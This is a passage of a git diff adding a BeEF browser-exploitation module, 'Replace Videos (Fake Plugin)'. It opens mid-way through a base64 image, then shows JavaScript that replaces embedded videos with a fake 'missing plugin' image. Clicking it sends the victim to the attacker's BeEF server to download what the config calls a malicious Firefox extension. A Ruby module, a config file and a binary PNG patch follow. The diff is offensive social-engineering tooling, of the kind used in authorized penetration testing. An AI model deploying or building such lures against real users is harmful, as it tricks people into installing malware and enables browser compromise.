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" onclick="window.location=\'<%== @url %>\';" />');
+	});
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Replace video successful");
+});
diff --git a/modules/social_engineering/replace_video_fake_plugin/config.yaml b/modules/social_engineering/replace_video_fake_plugin/config.yaml
new file mode 100644
index 000000000..d085c1a62
--- /dev/null
+++ b/modules/social_engineering/replace_video_fake_plugin/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        replace_video_fake_plugin:
+            enable: true
+            category: ["Social Engineering"]
+            name: "Replace Videos (Fake Plugin)"
+            description: "Replaces an object selected with jQuery (all embed tags by default) with an image advising the user to install a missing plugin. If the user clicks the image they will be prompted to download a malicious Firefox extension (by default)."
+            authors: ["Yori Kvitchko", "antisnatchor", "bcoles"]
+            target:
+                user_notify: ['ALL']
diff --git a/modules/social_engineering/replace_video_fake_plugin/module.rb b/modules/social_engineering/replace_video_fake_plugin/module.rb
new file mode 100644
index 000000000..bae133509
--- /dev/null
+++ b/modules/social_engineering/replace_video_fake_plugin/module.rb
@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Replace_video_fake_plugin < BeEF::Core::Command
+
+  def self.options
+    @configuration = BeEF::Core::Configuration.instance
+    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    url = 'http://' + beef_host + ':' + @configuration.get("beef.http.port")
+    return [
+        {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url+'/api/ipec/ff_extension', 'width'=>'150px'},
+        {'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width'=>'150px'}
+    ]
+  end
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end
+
+end
diff --git a/modules/social_engineering/replace_video_fake_plugin/plugins-required.png b/modules/social_engineering/replace_video_fake_plugin/plugins-required.png
new file mode 100644
index 0000000000000000000000000000000000000000..7b0885492390c340b12849465c84b9e217208ccf
GIT binary patch
literal 11310
zcmXAPbzD>5|Nk~N7)%-g$<g6R;SG!$h`>Nnx>HJ}1(Db$2uOFQlyoT#13^lV4h1Pe
zO6idN?eqQpaqm6n@wjpBIj`4wJ)f`FGg4Pujhu{$3;+O-qt#XP0RW&Wp&bha5zcfA
zyETLh&|6<k8BjgSvPI~Cos_hc0D!tU*p)4W&?og!H}wVpC_ex10QS3=IRF6nKciKY
z4E(MBSh`GF8m4UM=w7|~m1W&Z`^1$+oH`M}+g{MEUg-SresMC7-~hu%{vpBPdW2Bb
z#DspfhNB0dTkzu}V8VDl2RDcGx1+J|pQ=v1zqR@;1)VjYHjK(hi3EKk@%P?SaQY)D
ze`)HL=l$1o$%^$ptP)XMk8kP<GMb0RRmG-2jOhJaP4csMO%a$2wK%rxQNK>_tMdas
zqy8Zf;cjmjJOK+)-)7+~ssr$`$iCb?-kOY)I~<tpx;d!{KB>5!XFcaq@XF&OAz`2R
zJ;C=*IJ4!SeZ-U9Qu9!n-!!F_K9$51=SEr@?U#Ss_Bzh25P#HNZDqtbxoZI^kJaAD
zaJGQWKkgxyJZTn(yH1Li)~##S5Bf{Avi^HQqW#sf;o{%9vP-0)<tWSNY99nx{EwQT
z3@_g}Db2awP0RBipYB&Tua;!J04d=$*gq>pKp27W=CxQ^;nvMUC%LtI-vVYDUjAKZ
zd42X*{`KkZVjIJ)Z}=7MZO1YWHhM;Jo7Zjpf=*$n$=y0o>-J)>D@V7*;P9e_bWB++
z30LV)al?llFDFB0E%)MLJ9*xadb|y@$Ts;{y61e><o!-n_8wO$%5Jo_B_i>g3v1HR
zw?`k`e;FxWV9Q&AMa4Lc7Vo^#j7+e7&VBeG@84s@wy|~4$s0-qs0wu11_%qK4!k+a
zBME&rUk^!>_E^SuzabInJYNmbWVIm|DWu3wZ_nR&Xtr6LW<_|P95J81S!aY%(o90C
zbZ2a%%J;ZzT2Fc>!|#y~)#>ie%*+7p!KKw=Szev5gcH3K?FV7Nov)X%B&T~zajgJ;
z02H%G$%;H)W#~Gu?<2}%Q3yQenZnYp!H8#dZoCDQZ6!5^(@+rQk(5|Rx5@4YCG35B
z7IVv$96q5JUZxlj4U6Gt-&xD>r)4_i8zumKOlMDw)XxY{Msm7@=ErQ!$Lnd<Hxplo
zN(Zu=iGKe_mVKuQ8fFiTlnygWnjGh(M$%M=s*FZTN5R<CljS%ldLr#;l~eiE)g``^
zs}?d+!Q}WAXD+`5{q^S4$@P(iJwbRB0W54TPyZOg$DpzOW1U5RU~v=5Cuo{qGz_Rz
z?t%ifn)gQ~Jm^qOnr?fbk8*Z)&p%HARQ?&4Dy{+E-SlEH;QD0ta>^zaf{JMS+q(1b
zTgXiqgH^=4Vm#Dt&4__MO2iwz3e(cYa~jw$6zL*`wipX}Tzww%(xh=4qC`{@9`ytI
z$i|j+Fq2|0?Ibl81D#oiZ5VU_!D=gU<iIJIGpu=}Pk<i7myPr#vwSE@BEcw{EKHur
zR?Ofu?23l1&j`cxDDBGLRh<F^cTCa&Y1}|6gS$RN(U{!fq(iVYYu1>Yx*m+mAm$!3
za0;NMQhCw529JT1v11_ow23)5*NoZARSQcri02x>#13r+kl{y-3*Mdi0PZp>y#l>t
zt-$W+;PqG0|Fk?zwAJLPzzy{nR?8ckx_&ErQWzeVdzAf~I|~wEc>T{baGngTaJLbl
zBx&-xbR@f%1C!5UZjm?^+_;ZGqNQ0|cH_}zR|6kNS+Njj_Rjq<k*|lKZjb?WK2@h)
zc{E&#56QO$sLw}ODo*|_vX4kr-x=VEEbe{p`%B#6>L~~J1gYH=b#Gob&Y|5XO<Ysk
z6$6(7es5N~uGG`LvPIK4vfs})^GQ5MZr_#IPNy}<#XM4T%(?p*bIP^S+sUYuL>r_i
zZX$ZqGyUD+Q1guyh=2CYW`{&P>{Dw41M8bFhOZI|cr^A6qE7t*LSi4(eL)g>#!uC}
zK#j43CGIlsewnlHX4auTxb6Z1JZD64*<CILngt`^{svtk^36NomsOc&S95~H1H00m
z631{^Xrvg`GV-}eJP~disd}kzY95QJcZ}kTsc=g7IVxUCQK2<#RC#f?4rA#S`Fm<s
zR(Lbt1;@>1KUJ3*q@X3dS=IwuhzSh>msO>GhiO{VbBz_L$UP0>Azc~5=>NxahXkBD
z?d9-P?Y{GP0&FUq-OvPn30)ZZ&*yEW2;5mC+Uk?N^Jf}#J!0nJB$}`U6%!~?Ca!(*
z#HeW`{j$~j-wJ0f&A^Q1x<-*S2zY3^zUIXPTYXPKhWgs=a}-{PgWv~P4AF5hpqmOg
zQwKO>klTCpjfh@CW_oqlA};^?<|pVhH@eG`6#4cG7-Y{?RcQ}=C4}T1UUN7+r`?1>
z%k=~w)b(ytq4NK*(wNvdfQL?GM9G92NjCxud<KZog|lg?%>gs{@ybC!thlBS3MFD@
z$g0&2Z$fMKySce6^I{agkl@Nay@{?S@Wut-!%E280%n%K0zsOQ#wBtPjlxJnT6*bE
zYdQ&|gGTVpM`gs0Nw!5|FTB3CZc^VdW1^c#B$i#ru~4pE%^55~1YF1UzOhS=^q|hz
zYV*^w8v(%Q7EDm*NG-7`O)=&FS=?c8yu<c{k$e&spO;lE!Kl<vj3_(BI$IO$Ej&Vk
z+@*uMPYa*O4T;;JYXpyNo4$eHjhq&LDYc>^6Q&(cjmdBEGs)-o(I!TX_2MpQ%9}pc
